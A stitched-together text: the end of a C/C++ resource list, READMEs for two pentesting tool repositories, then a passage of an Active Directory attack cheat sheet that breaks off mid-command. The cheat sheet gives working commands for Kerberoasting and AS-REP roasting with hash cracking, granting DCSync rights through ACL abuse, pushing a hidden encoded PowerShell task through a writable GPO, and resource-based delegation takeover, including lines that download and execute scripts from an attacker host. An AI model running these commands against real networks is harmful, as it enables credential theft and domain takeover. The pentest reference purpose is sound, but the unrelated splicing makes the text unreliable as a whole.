Tutorials](https://www.youtube.com/playlist?list=PL_c9BZzLwBRKKqOc9TJz1pP0ASrxLMtp2) - An all-in-one playlist of tutorials for C programming. * [C Programming Tutorials](https://www.youtube.com/playlist?list=PL78280D6BE6F05D34) - All of TheNewBoston's C programming tutorials are right here. * [Bo Qian's playlist](https://www.youtube.com/user/BoQianTheProgrammer/playlists) - Boost Library, C++ Standard Library, Modern C++, Advanced C++, Advanced STL, ... ## Websites *Useful C or C++ related websites.* * [Standard C++](https://isocpp.org/) :zap: - News, Status & Discussion about Standard C++. * [Build Bench](https://build-bench.com/) - Compare C++ Builds. * [Quick Bench](https://quick-bench.com/) - Quick C++ Benchmarks. * [CppCon](http://cppcon.org/) - The C++ Conference. * [C++ reference](https://cppreference.com) - A complete online reference for the C and C++ languages and standard libraries. * [C++ by Example](http://www.cbyexample.com/) - Learn C++ by Example. * [cplusplus.com](http://www.cplusplus.com/) - The C++ Resources Network. * [C FAQ](http://c-faq.com/) - C frequently asked questions. * [C++ FAQ](http://www.parashift.com/c++-faq/) - C++ frequently asked questions. * [C++ FQA Lite](http://yosefk.com/c++fqa/) - C++ frequently questioned answers. * [C++ Quiz](https://cppquiz.org) - A simple online quiz that you can use to test your knowledge of the C++ programming language. * [Guru of the Week](http://www.gotw.ca/gotw/) - A regular series of C++ programming problems created and written by Herb Sutter. * [Meeting C++](http://meetingcpp.com/) * [PVS-Studio’s challenge](https://quiz.pvs-studio.com) - PVS-Studio’s C++ quiz in which you're asked to find errors in code fragments of open source projects. * [Udemy C++ Courses and Tutorials](https://www.udemy.com/topic/C-plus-plus-tutorials/) * [C++ Hints](http://cpphints.com/) - Every business day hints about most often C++ mistakes and ways to solve them from PVS-Studio Team. * [C++ tutorial](https://hackr.io/tutorials/learn-c-plus-plus) - A user ranked online tutorial bank site displaying multiple courses to learn C++ from. * [C++ Tutorial for Beginners](https://www.scaler.com/topics/cpp) - A comprenhensive tutorial on C++ curated by trained experts. * [cppexpert.online](https://cppexpert.online) - Learn the best C++ practices by improving code snippets with some problems or with bad practices. ## Weblogs *Useful C or C++ related weblogs.* * [Coding For Speed](https://codingforspeed.com/) - Coding For Speed DOT COM, Less Execution Time. * [Eric Niebler](http://ericniebler.com/) * [Sticky Bits](https://blog.feabhas.com/) * [Paul Fultz II's Blog](http://pfultz2.com/blog/) * [ridiculousfish](http://ridiculousfish.com/blog/posts/will-it-optimize.html) - Will It Optimize? * [Embedded in Academia](http://blog.regehr.org/) * [Simplify C++](https://arne-mertz.de/) * [Fluent C++](https://www.fluentcpp.com/) * [Bartek's Coding Blog](https://www.bfilipek.com/?m=1) * [Kenny Kerr](https://kennykerr.ca/articles/) * [Sutter’s Mill](https://herbsutter.com/gotw/) * [Vorbrodt's C++ Blog](https://vorbrodt.blog/) * [foonathan::blog()](https://foonathan.net/index.html) ## Other Awesome Projects *Collection of useful codes, snippets, ...* * [algorithms](https://github.com/xtaci/algorithms) - Algorithms & Data Structures in C++. * [c-algorithms](https://github.com/fragglet/c-algorithms) - C algorithms library. * [30 Seconds of C++](https://github.com/Bhupesh-V/30-seconds-of-cpp) # Other Awesome Lists *Other amazingly awesome lists* * [lists](https://github.com/jnv/lists) - List of (awesome) lists curated on GitHub. * [awesome-awesomeness](https://github.com/bayandin/awesome-awesomeness) - A curated list of awesome awesomeness. * [awesome](https://github.com/sindresorhus/awesome) :zap: - A curated list of awesome lists. * [C++ links](https://github.com/MattPD/cpplinks) - A categorized list of C++ resources. * [Awesome C++](https://cpp.libhunt.com/) - LibHunt's mirror. * [Awesome C](https://notabug.org/koz.ross/awesome-c) 1 * [Awesome C](https://github.com/aleksandar-todorovic/awesome-c) 2 * [Awesome Modern C++](https://github.com/rigtorp/awesome-modern-cpp) - A collection of resources on modern C++. * [AwesomePerfCpp](https://github.com/fenbf/AwesomePerfCpp) - A curated list of awesome C/C++ performance optimization resources. * [free-programming-books](https://github.com/vhf/free-programming-books) - List of Freely Available Programming Books. * [Inqlude](http://inqlude.org/) - The Qt library archive. * [papers-we-love](https://github.com/papers-we-love/papers-we-love) - Papers from the computer science community to read and discuss. * [awesome-algorithms](https://github.com/tayllan/awesome-algorithms) - A curated list of awesome places to learn and/or practice algorithms. * [awesome-hpp](https://github.com/p-ranav/awesome-hpp) - A curated list of awesome header-only C++ libraries. * [awesome-talks](https://github.com/JanVanRyswyck/awesome-talks) - A lot of screencasts, recordings of user group gatherings and conference talks. * [Projects](https://github.com/karan/Projects) - A list of practical projects that anyone can solve in any programming language. * [Awesome interview questions](https://github.com/MaximAbramchuck/awesome-interviews) - A list of lists of interview questions for the most popular technologies, including C and C++. * [nothings/single_file_libs](https://github.com/nothings/single_file_libs) :zap: - List of single-file C/C++ libraries. # Jobs * This list is currently empty, but you can add to it by opening a merge request. # Sponsors * Please reach out if you are interested in sponsoring this repo. Your company's name and logo will be prominently displayed here. # Contributing Please take a quick gander at the [contribution guidelines](https://github.com/fffaraz/awesome-cpp/blob/master/CONTRIBUTING.md) for details. Thanks to all [contributors](https://github.com/fffaraz/awesome-cpp/graphs/contributors); you rock! #### *If you see a project or link here that is no longer maintained or is not a good fit, please submit a pull request to improve this document. Thank you!*
<h1 align="center">pentest-tools</h1> <h4 align="center">A collection of custom security tools for quick needs.</h4> <p align="center"> <img src="https://img.shields.io/badge/-bash-gray" alt="bash badge"> <img src="https://img.shields.io/badge/python-v3-blue" alt="python badge"> <img src="https://img.shields.io/badge/php-%3E=5.5-blue" alt="php badge"> <img src="https://img.shields.io/badge/license-MIT-green" alt="MIT license badge"> <a href="https://twitter.com/intent/tweet?text=https%3a%2f%2fgithub.com%2fgwen001%2fpentest-tools%2f" target="_blank"><img src="https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Fgithub.com%2Fgwen001%2Fpentest-tools" alt="twitter badge"></a> </p> <!-- <p align="center"> <img src="https://img.shields.io/github/stars/gwen001/pentest-tools?style=social" alt="github stars badge"> <img src="https://img.shields.io/github/watchers/gwen001/pentest-tools?style=social" alt="github watchers badge"> <img src="https://img.shields.io/github/forks/gwen001/pentest-tools?style=social" alt="github forks badge"> </p> --> --- ## Important note ‼ A big clean occured in 2022-11 ‼ Some useless/not working scripts have been archived and some others have been moved to their own repository to get more visibility, feel free to check them: - [apk-analyzer](https://github.com/gwen001/apk-analyzer) - [cloudflare-origin-ip](https://github.com/gwen001/cloudflare-origin-ip) - [csp-analyzer](https://github.com/gwen001/csp-analyzer) - [detectify-cves](https://github.com/gwen001/detectify-cves) - [extract-endpoints](https://github.com/gwen001/extract-endpoints) - [favicon-hashtrick](https://github.com/gwen001/favicon-hashtrick) - [google-search](https://github.com/gwen001/google-search) - [graphql-introspection-analyzer](https://github.com/gwen001/graphql-introspection-analyzer) - [keyhacks.sh](https://github.com/gwen001/keyhacks.sh) - [related-domains](https://github.com/gwen001/related-domains) --- ## Install ``` git clone https://github.com/gwen001/pentest-tools cd pentest-tools pip3 install -r requirements.txt ``` --- ## arpa.sh Converts IP address in `arpa` format to classical format. ## bbhost.sh Performs `host` command on a given hosts list using `parallel` to make it fast. ## codeshare.php Performs a string search on [codeshare.io](https://codeshare.io/). ## cors.py Test CORS issue on a given list of hosts. ## crlf.py Test CRLF issue on a given list of hosts. ## crtsh.php Grabs subdomains of a given domain from [crt.sh](https://crt.sh). ## detect-vnc-rdp.sh Tests if ports `3389` and `5900` are open on a given IP range using `netcat`. ## dnsenum-brute.sh Performs brute force through wordlist to find subdomains. ## dnsenum-bruten.sh Performs brute force through numeric variation to find subdomains. ## dnsenum-reverse.sh Apply reverse DNS method on a given IP range to find subdomains. ## dnsenum-reverserange.sh Same thing but IP ranges are read from an input file. ## dnsenum-zonetransfer.sh Tests Zone Transfer of a given domain. ## dnsreq-alltypes.sh Performs all types of DNS requests for a given (sub)domain. ## extract-domains.py Extracts domain of a given URL or a list of URLs. ## extract_links.php Extracts links from a given HTML file. ## filterurls.py Classifies and displays URLs by vulnerability types. ## flash-regexp.sh Performs regexps listed in `flash-regexp.txt` for Flash apps testing purpose. ## gdorks.php Generates Google dorks for a given domain (searches are not performed). ## hashall.php Uses about 40 algorithms to hash a given string. ## ip-converter.php Converts a given IP address to different format, see [Nicolas Grégoire presentation](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf). ## ip-listing.php Generates a list of IPs addresses from the given start to the given end, range and mask supported. ## mass_axfr.sh Mass test zone transfer on a given list of domains. ## mass-smtp-user-enum-bruteforce.sh Performs SMTP user enumeration on a given list of IP address using [smtp-user-enum](https://github.com/pentestmonkey/smtp-user-enum). ## mass-smtp-user-enum-check.sh Tests if SMTP user enumeration is possible on a given list of IP address using [smtp-user-enum](https://github.com/pentestmonkey/smtp-user-enum). ## myutils.sh Just few common Bash functions. ## node-uuid.js Encode/Decode UUID using base36. ## nrpe.sh Test Nagios Remote Plugin Executor Arbitrary Command Execution on a given host using Metasploit. ## openredirect.py Test Open Redirect issue on a given list of hosts. ## pass-permut.php Creates words permutation with different separators and output the hashes using about 40 algorithms. ## pastebin.php Performs a string search on [pastebin.com](https://pastebin.com/). ## phantom-xss.js See `xss.py`. ## ping-sweep-nc.sh Determines what IPs are alive in a given range of IPs addresses using `netcat`. ## ping-sweep-nmap.sh Determines what IPs are alive in a given range of IPs addresses using `nmap`. ## ping-sweep-ping.sh Determines what IPs are alive in a given range of IPs addresses using `ping`. ## portscan-nc.sh Determines the open ports of a given IP address using `netcat`. ## quick-hits.php Tests a given list of path on a given list of hosts. ## quickhits.py Same but the Python version. Tests a given list of path on a given list of hosts. ## rce.py Test RCE issue on a given list of hosts. ## resolve.py Resolves a give list of hosts to check which ones are alive and which ones are dead. ## screensite.sh Takes screenshots of a given url+port using `xvfb`. ## shodan.php Performs searches on Shodan using their API. ## smuggler.py Test HTTP request smuggling issue on a given list of hosts. ## srv_reco.sh Perform very small tests of a given IP address. ## ssh-timing-b4-pass.sh Tries to guess SSH users using timing attack. ## ssrf-generate-ip.php Generate random IP address:port inside private network range for SSRF scans. ## subalt.py Generates subdomains alterations and permutations. ## test-ip-wordlist.sh Brute force a wordlist on IPs range and ports list. ## testhttp.php Tries to determine if an url (subdomain+port) is a web thing. ## testnc.sh Performs fuzzing on a given IP address+port using `netcat`. ## Utils.php Just few common PHP functions. ## webdav-bruteforce.sh Perform brute force on a given url that use `WebDav` using [Davtest](https://github.com/cldrn/davtest). ## xss.py Test XSS issue on a given list of hosts using `phantomjs`. --- Feel free to [open an issue](/../../issues/) if you have any problem with the script.
# **Disclaimer** Use the scripts, tools and workflows available in this repository at your own risk. </br> </br> Any breach of law, you can be held responsible. </br> ## Informational I made these scripts for my needs and tried to understand a little bit of how some bug hunters work and put some of those steps in a logical order for me. </br> </br> Until I consider this work finished, I'll continue to study and saw how some people work and put it in features within collector script. :D </br> </br> Here in this README.md I put just the list of main scripts and a little bit of information about your functionality. </br> </br> Any other secondary scripts in this repository will have it's description in the script header. ## Main scripts - **collector**: can be find in recon directory and your funcionality is subdomain and web data discovery; - **g4sp4rz1nh0**: modified splitter to create a infraestructure to anonizamtion during pentest to avoid WAF/Firewall block to our IP. If you need to understand how it's works, you need to see this [link](https://github.com/renergr1nch/splitter); - **get-tools**: can be find in useful directory and prepare the operation system to collector and get other tools to help in pentest; - **seek-leak**: tool to search for leaks on onion network. ## Thanks [Alfredo Casanova](https://github.com/atcasanova) with some bash code corrections. </br> [Caue Bici](https://github.com/caueobici) with code review and answer some questions about python programming. </br> [Enderson Maia](https://github.com/endersonmaia) with the help on Dockerfile and shellcheck tip. </br> [Henrique Galdino](https://github.com/Achilles0x0) the help with some curl options. </br> [Icaro Torres](https://github.com/icarot) with the ideia to diff files from a day ago to improve the execution time of the script. </br> [Manoel Abreu](https://github.com/manoelt) with the ideia to use the [git-dumper.py](https://github.com/arthaud/git-dumper) in rebuild\_git function. </br> [Rener aka gr1nch](https://github.com/renergr1nch/splitter) thanks to made the splitter, you rocks dude!! </br> [Ulisses Alves](https://github.com/ualvesdias) with code review and answer some questions about python programming! </br> ## Resources https://0xsp.com/offensive/red-teaming-toolkit-collection </br> https://medium.com/@ricardoiramar/subdomain-enumeration-tools-evaluation-57d4ec02d69e </br> https://github.com/riramar/Web-Attack-Cheat-Sheet </br> https://inteltechniques.com/blog/2018/03/06/updated-osint-flowcharts/ </br> https://github.com/sehno/Bug-bounty/blob/master/bugbounty_checklist.md </br> https://github.com/renergr1nch/splitter </br> https://bitbucket.org/splazit/docker-privoxy-alpine/src/master/ </br> https://github.com/essandess/adblock2privoxy </br> https://0xpatrik.com/subdomain-enumeration-2019/ </br> https://blog.securitybreached.org/2017/11/25/guide-to-basic-recon-for-bugbounty/ </br> https://medium.com/@shifacyclewala/the-complete-subdomain-enumeration-guide-b097796e0f3 </br> https://www.secjuice.com/penetration-testing-for-beginners-part-1-an-overview/ </br> https://www.secjuice.com/reconnaissance-for-beginners/ </br> https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 </br> https://medium.com/hackernoon/10-rules-of-bug-bounty-65082473ab8c </br> https://https://findomain.app/findomain-advanced-automated-and-modern-recon/ </br> https://www.offensity.com/de/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/ </br> https://medium.com/hackcura/learning-path-for-bug-bounty-6173557662a7 </br> https://eslam3kl.medium.com/simple-recon-methodology-920f5c5936d4 </br> https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters </br> https://www.offensity.com/en/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/ </br> https://blog.projectdiscovery.io/reconnaissance-a-deep-dive-in-active-passive-reconnaissance/ </br> **Warning:** The code of all scripts find here was originally created for personal use, it generates a substantial amount of traffic, please use with caution.
[![homepage](https://img.shields.io/badge/Homepage-snovvcrash.github.io-success?style=social&logo=jekyll&logoColor=cc0000)](https://snovvcrash.github.io/) [![github](https://img.shields.io/github/stars/snovvcrash/PPN?label=Star%20on%20GitHub&style=social)](https://github.com/snovvcrash/PPN) [![twitter](https://img.shields.io/twitter/follow/snovvcrash?label=Follow%20on%20Twitter&style=social)](https://twitter.com/snovvcrash) ❗❗❗ **THIS PAGE IS DEPRECATED. THE PROJECT HAS MOVED [HERE](https://ppn.snovvcrash.rocks/)** ❗❗❗ ⚠️ **DISCLAIMER.** All information contained in this blog post is provided for educational and research purposes only. The author is not responsible for any illegal use of any information published in this blog post. ⚠️ Use your <kbd>Ctrl</kbd>-<kbd>F</kbd> to navigate this mess. [//]: # (# -- 5 spaces) [//]: # (## -- 4 spaces) [//]: # (### -- 3 spaces) [//]: # (#### -- 2 spaces) [//]: # (##### -- 1 space) * TOC {:toc} # AD ## Roasting ### ASREPRoasting Show domain users with `DONT_REQ_PREAUTH` flag set: ``` PowerView3 > Get-DomainUser -UACFilter DONT_REQ_PREAUTH ``` #### Normal ##### GetNPUsers.py * [https://vbscrub.com/2020/02/22/impackets-getnpusers-script-explained/](https://vbscrub.com/2020/02/22/impackets-getnpusers-script-explained/) ``` $ GetNPUsers.py megacorp.local/ -dc-ip 127.0.0.1 -no-pass -usersfile /usr/share/seclists/Usernames/Names/names.txt -request -format hashcat -outputfile asprep.in | tee GetNPUsers.out $ cat GetNPUsers.out | grep -v 'Client not found in Kerberos database' $ hashcat -m 18200 -a 0 -w 4 -O --session=asprep -o asprep.out asprep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule ``` ##### ASREPRoast.ps1 * [https://github.com/HarmJ0y/ASREPRoast](https://github.com/HarmJ0y/ASREPRoast) ``` PS > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash ``` #### Targeted * [https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#asreproast](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#asreproast) Given GenericWrite/GenericAll DACL rights over a target, we can modify most of the user’s attributes. We can change a victim’s userAccountControl to not require Kerberos preauthentication, grab the user’s crackable AS-REP, and then change the setting back. (@harmj0y, [ref](https://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/)) ``` PowerView2 > Get-DomainUser snovvcrash | ConvertFrom-UACValue PowerView2 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose PowerView2 > Get-DomainUser snovvcrash | ConvertFrom-UACValue ASREPRoast > Get-ASREPHash -Domain megacorp.local -UserName snovvcrash PowerView2 > Set-DomainObject -Identity snovvcrash -XOR @{useraccountcontrol=4194304} -Verbose PowerView2 > Get-DomainUser snovvcrash | ConvertFrom-UACValue ``` ### Kerberoasting * [https://www.harmj0y.net/blog/redteaming/kerberoasting-revisited/](https://www.harmj0y.net/blog/redteaming/kerberoasting-revisited/) * [http://www.harmj0y.net/blog/redteaming/rubeus-now-with-more-kekeo/](http://www.harmj0y.net/blog/redteaming/rubeus-now-with-more-kekeo/) * [https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/](https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) * [https://github.com/GhostPack/Rubeus#kerberoast](https://github.com/GhostPack/Rubeus#kerberoast) * [https://docs.microsoft.com/ru-ru/archive/blogs/openspecification/windows-configurations-for-kerberos-supported-encryption-type](https://docs.microsoft.com/ru-ru/archive/blogs/openspecification/windows-configurations-for-kerberos-supported-encryption-type) * [https://swarm.ptsecurity.com/kerberoasting-without-spns/](https://swarm.ptsecurity.com/kerberoasting-without-spns/) Check `msDS-SupportedEncryptionTypes` attribute (if RC4 is enabled): ``` PowerView3 > Get-DomainUser -Identity snovvcrash -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes ``` #### Normal ##### GetUserSPNs.py ``` $ GetUserSPNs.py megacorp.local/snovvcrash:'Passw0rd!' -dc-ip 127.0.0.1 [-request|-save] -outputfile tgsrep.in $ hashcat -m 13100 -a 0 -w 4 -O --session=tgsrep -o tgsrep.out tgsrep.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule ``` ##### PowerView * [https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1#L2777) ``` PowerView3 > Invoke-Kerberoast -OutputFormat Hashcat | fl ``` #### Targeted We can execute 'normal' Kerberoasting instead: given modification rights on a target, we can change the user’s serviceprincipalname to any SPN we want (even something fake), Kerberoast the service ticket, and then repair the serviceprincipalname value. (@harmj0y, [ref](https://www.harmj0y.net/blog/activedirectory/targeted-kerberoasting/)) ``` PowerView2 > Get-DomainUser snovvcrash | Select serviceprincipalname PowerView2 > Set-DomainObject -Identity snovvcrash -SET @{serviceprincipalname='nonexistent/BLAHBLAH'} PowerView2 > $User = Get-DomainUser snovvcrash PowerView2 > $User | Get-DomainSPNTicket | fl PowerView2 > $User | Select serviceprincipalname PowerView2 > Set-DomainObject -Identity snovvcrash -Clear serviceprincipalname ``` ## ACL Abuse * [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces) * [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) ### Hunt for ACLs #### PowerView2 Search for interesting ACLs: ``` PowerView2 > Invoke-ACLScanner -ResolveGUIDs ``` Check if the attacker "MEGACORP\sbauer" has `GenericWrite` permissions on the "jorden" user object: ``` PowerView2 > Get-ObjectAcl -samAccountName jorden -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericWrite" -and $_.IdentityReference -eq "MEGACORP\sbauer"} InheritedObjectType : All ObjectDN : CN=Jorden Mclean,OU=Athens,OU=Employees,DC=MEGACORP,DC=LOCAL <== Victim (jorden) ObjectType : All IdentityReference : MEGACORP\sbauer <== Attacker (sbauer) IsInherited : False ActiveDirectoryRights : GenericWrite PropagationFlags : None ObjectFlags : None InheritanceFlags : ContainerInherit InheritanceType : All AccessControlType : Allow ObjectSID : S-1-5-21-3167813660-1240564177-918740779-3110 ``` #### PowerView3 Search for interesting ACLs: ``` PowerView3 > Find-InterestingDomainAcl -ResolveGUIDs | ? {$_.IdentityReferenceClass -match "user"} AceType : AccessAllowed ObjectDN : CN=Jorden Mclean,OU=Athens,OU=Employees,DC=MEGACORP,DC=LOCAL ActiveDirectoryRights : GenericWrite OpaqueLength : 0 ObjectSID : S-1-5-21-3167813660-1240564177-918740779-3110 <== Victim (jorden) InheritanceFlags : ContainerInherit BinaryLength : 36 IsInherited : False IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-21-3167813660-1240564177-918740779-3102 <== Attacker (sbauer) AccessMask : 131112 AuditFlags : None AceFlags : ContainerInherit AceQualifier : AccessAllowed ``` Check if the attacker "MEGACORP\sbauer" (`S-1-5-21-3167813660-1240564177-918740779-3102`) has `GenericWrite` permissions on the "jorden" user object: ``` PowerView3 > Get-DomainObjectAcl -Identity jorden -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericWrite" -and $_.SecurityIdentifier -eq "S-1-5-21-3167813660-1240564177-918740779-3102"} ``` Notes: * PowerView 3.0 does not return `IdentityReference` property, which makes it less handy for this task (however, you may filter the output by the attacker's SID). * `-ResolveGUIDs` switch shows `ObjectType` and `InheritedObjectType` properties in a human form (not in GUIDs). ### Exchange Windows Permissions Privilege escalation with ACLs in AD by example of the `Exchange Windows Permissions` domain group. Add user to the `Exchange Windows Permissions` group: ``` PS > Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members snovvcrash ``` Add DCSync rights with PowerView2: ``` PowerView2 > Add-ObjectAcl -TargetDistinguishedName "DC=megacorp,DC=local" -PrincipalName snovvcrash -Rights DCSync -Verbose ``` Add DCSync rights with PowerView3: ``` PS > $cred = New-Object System.Management.Automation.PSCredential("snovvcrash", $(ConvertTo-SecureString "Passw0rd!" -AsPlainText -Force)) PowerView3 > Add-DomainObjectAcl -TargetIdentity "DC=megacorp,DC=local" -PrincipalIdentity snovvcrash -Credential $cred -Rights DCSync -Verbose ``` Add DCSync rights with ntlmrelayx.py: ``` $ sudo ntlmrelayx.py -t ldap://DC01.megacorp.local --escalate-user snovvcrash ``` Add DCSync rights with aclpwn.py: * [https://github.com/fox-it/aclpwn.py](https://github.com/fox-it/aclpwn.py) * [https://www.slideshare.net/DirkjanMollema/aclpwn-active-directory-acl-exploitation-with-bloodhound](https://www.slideshare.net/DirkjanMollema/aclpwn-active-directory-acl-exploitation-with-bloodhound) * [https://www.puckiestyle.nl/aclpwn-py/](https://www.puckiestyle.nl/aclpwn-py/) ``` $ aclpwn -f snovvcrash -ft user -t megacorp.local -tt domain -d megacorp.local -du neo4j -dp neo4j --server 127.0.0.1 -u snovvcrash -p 'Passw0rd!' -sp 'Passw0rd!' ``` Add DCSync rights with ActiveDirectory module: * [https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/DomainObject.md](https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/DomainObject.md) 1. Получить ACL для корневого объекта (домен). 2. Получить SID для аккаунта, которому нужно дать DCSync. 3. Создать новый ACL и выставить в нем права "Replicating Directory Changes" (GUID `1131f6ad-...`) и "Replicating Directory Changes All" (GUID `1131f6aa-...`) для SID из п. 2. 4. Применить изменения. ``` PS > Import-Module ActiveDirectory PS > $acl = Get-Acl "AD:DC=megacorp,DC=local" PS > $user = Get-ADUser snovvcrash PS > $sid = New-Object System.Security.Principal.SecurityIdentifier $user.SID PS > $objectGuid = New-Object guid 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 PS > $identity = [System.Security.Principal.IdentityReference] $sid PS > $adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight" PS > $type = [System.Security.AccessControl.AccessControlType] "Allow" PS > $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None" PS > $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType PS > $acl.AddAccessRule($ace) PS > $objectGuid = New-Object Guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 PS > $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType PS > $acl.AddAccessRule($ace) PS > Set-Acl -AclObject $acl "AD:DC=megacorp,DC=local" ``` ## GPO Abuse * [https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) * [https://pentestmag.com/gpo-abuse-you-cant-see-me/](https://pentestmag.com/gpo-abuse-you-cant-see-me/) * [https://wald0.com/?p=179](https://wald0.com/?p=179) * [https://habr.com/ru/company/jetinfosystems/blog/449278/](https://habr.com/ru/company/jetinfosystems/blog/449278/) * [https://github.com/EvotecIT/GPOZaurr](https://github.com/EvotecIT/GPOZaurr) ### Recon Show all GPOs in the domain: ``` PowerView3 > Get-NetGPO -Domain megacorp.local | select cn,displayname ``` Search for GPOs that are controlled by the "MEGACORP\PolicyAdmins" group: ``` PowerView3 > Get-NetGPO | % {Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "MEGACORP\PolicyAdmins"} ``` List computers that are affected by vulnerable (modifiable) GPO: ``` PowerView3 > Get-NetOU -GUID "00ff00ff-00ff-00ff-00ff-00ff00ff00ff" | % {Get-NetComputer -ADsPath $_} ``` Note: if I list all OUs affected by this GPO with PowerView, there will be no domain shown (like in BloodHound), but in Group Policy Manager we can see that it is presented. Check if computer settings are enabled for this GPO (and enable them if not): * [https://gist.github.com/snovvcrash/ecdc639b061fe787617d8d92d8549801](https://gist.github.com/snovvcrash/ecdc639b061fe787617d8d92d8549801) ``` PS > Get-Gpo VULN.GPO.NAME PS > Set-GpoStatus VULN.GPO.NAME -Status AllSettingsEnabled ``` ### Exploit Create a task with a pwsh payload: ``` $ echo 'sc -path "c:\\windows\\temp\\poc.txt" -value "GPO Abuse PoC..."' | iconv -t UTF-16LE | base64 -w0; echo cwBjACAALQBwAGEAdABoACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIACgA= PS > New-GPOImmediateTask -TaskName Pentest -GPODisplayName VULN.GPO.NAME -CommandArguments '-NoP -NonI -W Hidden -Enc cwBjACAALQBwAGEAdABoACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAHAAbwBjAC4AdAB4AHQAIgAgAC0AdgBhAGwAdQBlACAAIgBHAFAATwAgAEEAYgB1AHMAZQAgAFAAbwBDAC4ALgAuACIACgA=' -Force ``` Cleanup: ``` PS > New-GPOImmediateTask -GPODisplayName VULN.GPO.NAME -Remove -Force ``` Check when GP was last applied: ``` Cmd > GPRESULT /R ``` ## Delegation Abuse * [https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-kerberos/kerberos-delegations](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-kerberos/kerberos-delegations) ### Unconstrained * [https://adsecurity.org/?p=1667](https://adsecurity.org/?p=1667) * [https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/](https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/) ``` PowerView3 > Get-DomainComputer -Unconstrained | select dnshostname,samaccountname,useraccountcontrol ``` ### Resource-based Constrained Delegation (RBCD) * [https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) * [https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/](https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/) * [https://sensepost.com/blog/2020/chaining-multiple-techniques-and-tools-for-domain-takeover-using-rbcd/](https://sensepost.com/blog/2020/chaining-multiple-techniques-and-tools-for-domain-takeover-using-rbcd/) #### RBCD from Windows Load tools: ``` PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powermad.ps1") PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powerview4.ps1") ``` Check if `ms-DS-MachineAccountQuota` allows to create new machine accounts: ``` PS > $root = [ADSI]"LDAP://RootDSE" PS > $root.rootDomainNamingContext DC=megacorp,DC=local PowerView3 > Get-DomainObject -Identity "DC=megacorp,DC=local" | select ms-ds-machineaccountquota ms-ds-machineaccountquota ------------------------- 10 ``` Define credentials for the compromised account with the necessary DACL: ``` PS > $userWithDaclUsername = 'megacorp.local\snovvcrash' PS > $userWithDaclPassword = ConvertTo-SecureString 'Qwe123!@#' -AsPlainText -Force PS > $cred = New-Object System.Management.Automation.PSCredential($userWithDaclUsername, $userWithDaclPassword) ``` Add new machine account and configure RBCD on the vulnerable host (DC01): ``` PS > New-MachineAccount -MachineAccount fakemachine1337 -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose PowerView3 > $computerSID = Get-DomainComputer -Identity fakemachine1337 -Properties ObjectSid -Verbose -Credential $cred | Select -Expand ObjectSid PS > $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($computerSID))" PS > $SDBytes = New-Object byte[] ($SD.BinaryLength) PS > $SD.GetBinaryForm($SDBytes, 0) PowerView3 > Get-DomainComputer DC01.megacorp.local -Verbose -Credential $cred | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose -Credential $cred PS > .\Rubeus.exe hash 